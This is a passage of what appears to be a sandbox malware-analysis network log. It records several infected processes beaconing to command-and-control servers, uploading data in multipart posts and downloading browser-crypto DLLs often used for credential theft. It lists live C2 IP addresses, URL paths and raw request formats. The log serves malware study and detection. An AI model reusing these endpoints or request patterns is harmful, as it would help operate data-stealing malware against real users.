74 54 80 12 63 80 92 21 40 f2 0f 52 20 3f a0 bb 63 ec 28 a0 b2 6e 89 d5 55 eb b5 ba 8c 91 a2 c6 66 d0 29 4e bf 40 5d 22 19 66 c0 17 87 8a 62 de 7b 3f a6 e5 74 82 c0 c9 49 84 b6 ba 20 85 dc cd ea 54 c6 98 e0 fc 39 1c 16 d2 ea 15 e1 3e 1f 16 a0 ed a6 1c 3b 14 be ff 09 05 75 76 5f 21 2c 5e ca 63 35 1e [TRUNCATED] Data Ascii: --------------------------LD6ZS6L8rUHFQ5ehyM7ZrTContent-Disposition: form-data; name="file"; filename="Gojicu.bin"Content-Type: application/octet-stream-'$dU~Ie+]oAGl@Io~\|7W`"3(ntTc!@R ?c(nUf)N@]"fb{?tI T9>;uv_!,^c5P8&C`AY,&M-YK%Iwm@3nRlXl,2MNr!I>JoN.1?%!"\|+I7`?W{-oVHQYeg}D@LaMG#,r{ju+S~PQQKi@\ufJ(n0c%z6e\nH>KC7G3@bw)9/F-kgk`}E=ianBmw6"EqcaR=+$I&rfx: llVpQ7-s}-lyBP@!N8iAk?,x}qeS#7=RO<_3kyi\}myY9+\WWg9bxZdc&m1;@!#&QlU12@Zr\&Au(_hRIJM41o5:}y\|Br#}Qe^ug~5Z'mF++ [TRUNCATED]
Dec 22, 2024 02:18:22.877163887 CET	7416	OUT	Data Raw: 54 9b 64 0b f6 33 4d 31 a9 e7 59 2a a6 69 16 9e df 3e a3 f7 53 d2 1c e5 6a f3 05 be 68 f4 74 13 97 68 0f 62 cc 36 05 32 f6 dc b8 ff 61 98 33 1a a7 3b 5b f4 41 0b 9a 84 0c 95 20 b4 8e b3 6a 97 26 33 6f e1 b6 a5 46 68 ec 32 9b 14 89 e2 f6 a9 e0 7a Data Ascii: Td3M1Yi>Sjhthb62a3;[A j&3oFh2zI^j9I9wj+0lCR.Z/NU zhT!U@\Sq^dz*H'HjQKb,[o[3<&d<W5-Lj
Dec 22, 2024 02:18:22.877392054 CET	4944	OUT	Data Raw: 1c 98 7a c3 dd 5d 15 00 b5 a8 7d 61 8c e7 d9 9e 20 ad 6d 5e 7b 78 03 cb 5f 1e 93 c9 4d 02 ae be b5 58 d2 6e 58 bd e7 48 26 e1 50 94 c0 74 ea 4b 49 40 dc 75 06 35 58 f6 9f f7 c3 f2 bf fb 88 81 b5 0c 73 c9 79 2e f6 23 5f 9d 67 68 5f 41 76 92 3d 5d Data Ascii: z]}a m^{x_MXnXH&PtKI@u5Xsy.#_gh_Av=]v"H-2WHJM:/c/#KJEj&T{04${g6=8Z}V!8dz&3n\|F9=k1Yu'8M+)*\|
Dec 22, 2024 02:18:22.877427101 CET	3011	OUT	Data Raw: ac 1a ca ef 22 63 92 05 3b 6a e0 4a 80 63 30 14 f6 55 36 e8 62 29 8c ce 81 90 05 be a1 a4 b1 25 31 5a aa cb f1 f4 60 4d e4 bd 85 11 8a 32 5d 85 00 d9 28 c1 02 b6 1e 29 98 ed 12 64 ca bb a5 f0 bc 6e 2c 94 3d 11 4e 14 30 71 d8 04 bb 26 8e 10 b1 37 Data Ascii: "c;jJc0U6b)%1Z`M2]()dn,=N0q&7EuO>AgR/((e?D,TkOD7j{C\c{M4$n5byFy--.U/Td~^YMEsi;#g3)0v*T/P
Dec 22, 2024 02:18:24.407486916 CET	274	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 22 Dec 2024 01:18:24 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-RateLimit-Limit: 30 X-RateLimit-Remaining: 27 X-RateLimit-Reset: 1734832059 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	50152	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:23.851718903 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:25.171016932 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	50153	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:24.119618893 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:25.476321936 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:25 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	50159	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:26.932267904 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 22, 2024 02:18:28.271327972 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50160	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:27.771614075 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:28.722986937 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:28 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	50163	185.215.113.206	80	7748	C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:30.699223995 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:30.699306965 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Dec 22, 2024 02:18:32.491250992 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 22, 2024 02:18:32.638647079 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHI Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 45 48 49 4a 4b 4a 4b 45 42 46 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJDBAEHIJKJKEBFIEGHIContent-Disposition: form-data; name="file"------JJDBAEHIJKJKEBFIEGHI--
Dec 22, 2024 02:18:33.576499939 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 22, 2024 02:18:34.719768047 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEHDAAKEHJECBFHCBKF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 31 62 34 65 63 39 61 31 63 32 32 37 63 34 61 37 33 34 38 35 39 62 61 38 35 32 66 37 30 66 30 62 38 33 66 66 39 62 39 64 62 35 30 37 31 65 64 33 61 39 32 62 62 34 39 62 36 35 30 63 31 30 31 62 65 39 64 63 61 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 44 41 41 4b 45 48 4a 45 43 42 46 48 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="token"41b4ec9a1c227c4a734859ba852f70f0b83ff9b9db5071ed3a92bb49b650c101be9dca12------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AAEHDAAKEHJECBFHCBKFContent-Disposition: form-data; name="file"------AAEHDAAKEHJECBFHCBKF--
Dec 22, 2024 02:18:35.658689022 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 22, 2024 02:18:36.673425913 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 22, 2024 02:18:37.110907078 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 22, 2024 02:18:37.110981941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 22, 2024 02:18:37.111020088 CET	248	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 22, 2024 02:18:37.111052036 CET	1236	IN	Data Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18 Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(D$\$(sFD$,D$
Dec 22, 2024 02:18:37.111087084 CET	224	IN	Data Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8 Data Ascii: EE\|0)U\|2!!)]\|3)\|3!)}\|7!!)U\|2)\|2!!)M\|1t/EU;U]w"
Dec 22, 2024 02:18:37.111123085 CET	1236	IN	Data Raw: 31 ff 8b 45 0c 39 c6 74 3a 52 56 50 e8 20 01 08 00 eb 2d bf ff ff ff ff eb 3a b9 02 e0 ff ff 8b 5d d4 51 e8 73 00 08 00 83 c4 04 bf ff ff ff ff 8b 45 0c 39 c6 75 0c 53 6a 00 50 e8 af 00 08 00 83 c4 0c 8b 45 d8 85 c0 74 0a 53 50 e8 5c 00 08 00 83 Data Ascii: 1E9t:RVP -:]QsE9uSjPEtSP\M1$^_[]USWVut:}t$FHjShjVPt^_[]^_[]USWV}tVEGGHtIUuu
Dec 22, 2024 02:18:37.111159086 CET	1236	IN	Data Raw: 83 c4 10 eb 6e 8d 46 08 89 45 ec 8b 46 08 89 45 f0 c7 46 08 00 00 00 00 89 5e 04 8b 4b 04 ff 15 00 80 0a 10 ff d1 89 06 bb ff ff ff ff 85 c0 74 3d 89 f1 8b 55 10 ff 75 18 ff 75 14 e8 23 fc ff ff 83 c4 08 85 c0 74 1c 8b 3e 85 ff 74 20 8b 46 04 8b Data Ascii: nFEFEF^Kt=Uuu#t>t FHjWEM1^_[]USWVu>FHW>FHXSVW^_[]USWVu}E@HWVS^_[]
Dec 22, 2024 02:18:37.119105101 CET	1236	IN	Data Raw: ff ff 8a 04 0e 88 06 c6 04 0e 00 b8 02 00 00 00 0f b6 54 06 ff 0f b6 f9 01 d7 0f b6 8c 05 ef fe ff ff 01 f9 0f b6 f9 0f b6 1c 3e 88 5c 06 ff 88 14 3e 3d 00 01 00 00 74 25 0f b6 14 06 0f b6 f9 01 d7 0f b6 8c 05 f0 fe ff ff 01 f9 0f b6 f9 0f b6 1c Data Ascii: T>\>=t%>>fM1^_[]U}thuo]UVuE9sh;UMVuPu^]USWV4MEE9
Dec 22, 2024 02:18:37.119159937 CET	1236	IN	Data Raw: 0f f4 f7 66 0f 70 ef f5 66 0f f4 ec 66 0f 6f e0 66 0f fe 25 d0 20 08 10 66 0f 70 fe e8 66 0f 70 ed e8 66 0f 62 fd 66 0f 6e 6c 07 04 66 0f ef db 66 0f 60 eb 66 0f 61 eb 66 0f ef db 66 0f eb f9 66 0f 72 f4 17 66 0f fe 25 e0 20 08 10 f3 0f 5b cc 66 Data Ascii: fpffof% fpfpfbfnlff`fafffrf% [fpffpfpffpfbffof fnf`fafrfo- f[fpffpffof%!fpfpfbfnTf`faffrf[f
Dec 22, 2024 02:18:37.127305984 CET	1236	IN	Data Raw: 00 00 00 00 00 0f 1f 00 89 4d e8 8b 0c 0f 89 4d d4 89 ce 89 c1 d3 e6 09 d6 89 75 e0 8b 45 e8 8b 4d ec 01 c8 83 c0 01 0f b6 c0 8b 4d f0 0f b6 0c 01 00 cb 0f b6 f3 8b 55 f0 0f b6 14 32 8b 7d f0 88 14 07 8b 45 f0 88 0c 30 00 ca 0f b6 c2 8b 4d f0 0f Data Ascii: MMuEMMU2}E0MEEMLEE0}M1MMEUU}47}4E0UMUU}47
Dec 22, 2024 02:18:39.076142073 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 22, 2024 02:18:39.513606071 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:39 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 22, 2024 02:18:40.699064016 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 22, 2024 02:18:41.135471106 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:40 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 22, 2024 02:18:42.085360050 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 22, 2024 02:18:42.521893024 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:42 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 22, 2024 02:18:46.091733932 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
